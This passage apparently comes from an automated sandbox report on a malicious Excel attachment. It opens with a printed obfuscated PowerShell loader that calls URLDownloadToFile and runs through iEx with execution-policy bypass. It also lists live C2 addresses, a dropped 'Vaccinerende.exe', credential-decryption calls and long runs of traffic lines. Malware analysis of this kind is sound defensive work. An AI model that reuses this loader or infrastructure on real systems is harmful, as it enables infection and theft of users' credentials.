iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR
          Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4032, TargetFilename: C:\Users\user\AppData\Local\Temp\lpwdliyh.bjz.ps1

          Data Obfuscation

          Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'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'+[cHAR]0x22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4032, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.cmdline", ProcessId: 3152, ProcessName: csc.exe

          Stealing of Sensitive Information

          Source: Registry Key set | Author: Joe Security | Data: Details: 00 21 BC BC 23 53 AA E8 94 9B E0 2A 08 D0 4B 56 C2 2F A0 12 9A DA 0B CC 72 71 73 68 10 B5 BD 45 F4 15 E9 3D C8 20 16 66 6D 76 69 D1 DF 18 78 66 41 03 C0 AD 59 C2 23 8D A4 8B 34 7D 13 60 30 49 C4 1E C3 B2 19 6C E9 38 BA 4F 64 98 B2 7C A7 6C 16 CE E8 31 FA 4D 83 7C 50 F5 F3 3C E6 78 FA 25 98 10 1F 93 04 C3 , EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe, ProcessId: 924, TargetObject: HKEY_CURRENT_USER\Software\Rmc-DSGECX\exepath
          Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
          2024-09-30T09:53:25.275410+0200 | 2024197 | 1 | A Network Trojan was detected | 192.3.220.22 | 80 | 192.168.2.22 | 49164 | TCP
          2024-09-30T09:53:27.893933+0200 | 2024197 | 1 | A Network Trojan was detected | 192.3.220.22 | 80 | 192.168.2.22 | 49166 | TCP
          2024-09-30T09:53:25.270470+0200 | 2024449 | 1 | Attempted User Privilege Gain | 192.168.2.22 | 49164 | 192.3.220.22 | 80 | TCP
          2024-09-30T09:53:27.893925+0200 | 2024449 | 1 | Attempted User Privilege Gain | 192.168.2.22 | 49166 | 192.3.220.22 | 80 | TCP
          2024-09-30T09:53:50.060315+0200 | 2024449 | 1 | Attempted User Privilege Gain | 192.168.2.22 | 49172 | 192.3.220.22 | 80 | TCP
          2024-09-30T09:56:18.415693+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49174 | 107.173.4.16 | 2404 | TCP
          2024-09-30T09:56:20.260276+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49175 | 107.173.4.16 | 2404 | TCP
          2024-09-30T09:56:20.741800+0200 | 2803304 | 3 | Unknown Traffic | 192.168.2.22 | 49176 | 178.237.33.50 | 80 | TCP
          2024-09-30T09:56:14.719678+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.22 | 49173 | 192.3.220.22 | 80 | TCP
          2024-09-30T09:57:00.947013+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.22 | 49177 | 192.3.220.22 | 80 | TCP


          AV Detection

          Source: PO 11001 .xls | ReversingLabs: Detection: 28%
          Source: PO 11001 .xls | Virustotal: Detection: 25%
          Source: Yara match | File source: 00000021.00000002.1004764696.0000000006AA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: Vaccinerende.exe PID: 3116, type: MEMORYSTR
          Source: PO 11001 .xls | Joe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Code function: 34_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,34_2_00404423
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: unknown | HTTPS traffic detected: 104.21.78.54:443 -> 192.168.2.22:49163 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49165 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 104.21.78.54:443 -> 192.168.2.22:49170 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 104.21.78.54:443 -> 192.168.2.22:49169 version: TLS 1.2
          Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.802145913.0000000004CD0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Automation.pdb source: powershell.exe, 00000018.00000002.1002223931.0000000004F5A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.pdb source: powershell.exe, 00000007.00000002.434786957.0000000002FFF000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: .pdbu source: powershell.exe, 00000007.00000002.449310498.000000001C4D6000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.pdbhP source: powershell.exe, 00000007.00000002.434786957.000000000312A000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: System.Management.Automation.pdbg source: powershell.exe, 0000000C.00000002.802145913.0000000004CD0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\r4gn3nq1\r4gn3nq1.pdb source: powershell.exe, 00000013.00000002.479817740.0000000002952000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: :\Windows\System.Core.pdbpdbore.pdb2 source: powershell.exe, 00000018.00000002.902448214.0000000000491000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: :\Windows\System.Core.pdbpdbore.pdbD7 source: powershell.exe, 0000000C.00000002.777378103.0000000000442000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\r4gn3nq1\r4gn3nq1.pdbhP source: powershell.exe, 00000013.00000002.479817740.0000000002952000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: Automation.pdbG source: powershell.exe, 00000018.00000002.1002223931.0000000004F5A000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\AppData\Roaming\dllhost.exe | Code function: 11_2_0040595A GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,11_2_0040595A
          Source: C:\Users\user\AppData\Roaming\dllhost.exe | Code function: 11_2_00402862 FindFirstFileW,11_2_00402862
          Source: C:\Users\user\AppData\Roaming\dllhost.exe | Code function: 11_2_0040658F FindFirstFileW,FindClose,11_2_0040658F
          Source: C:\Users\user\AppData\Roaming\dllhost.exe | Code function: 23_2_0040595A GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,23_2_0040595A
          Source: C:\Users\user\AppData\Roaming\dllhost.exe | Code function: 23_2_00402862 FindFirstFileW,23_2_00402862
          Source: C:\Users\user\AppData\Roaming\dllhost.exe | Code function: 23_2_0040658F FindFirstFileW,FindClose,23_2_0040658F
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Code function: 33_2_0040595A GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,33_2_0040595A
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Code function: 33_2_00402862 FindFirstFileW,33_2_00402862
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Code function: 33_2_0040658F FindFirstFileW,FindClose,33_2_0040658F
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Code function: 34_2_0040AE51 FindFirstFileW,FindNextFileW,34_2_0040AE51
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Code function: 35_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,35_2_00407EF8
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Code function: 36_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,36_2_00407898
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | File opened: C:\Users\user\AppData\Local\Temp\wvibksbfizuvagm
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | File opened: C:\Users\user\AppData\Local\Temp\
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | File opened: C:\Users\user\AppData\
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | File opened: C:\Users\user\AppData\Local\
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | File opened: C:\Users\user\AppData\Local\Temp\tsdrjareurci
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | File opened: C:\Users\user\

          Software Vulnerabilities

          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\mshta.exe
          Source: global traffic | DNS query: name: og1.in
          Source: global traffic | DNS query: name: geoplugin.net
          Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 104.21.78.54:443
          Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
          Source: global traffic | TCP traffic: 192.168.2.22:49168 -> 104.21.78.54:443
          Source: global traffic | TCP traffic: 192.168.2.22:49169 -> 104.21.78.54:443
          Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.168.2.22:49176 -> 178.237.33.50:80
          Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global traffic | TCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
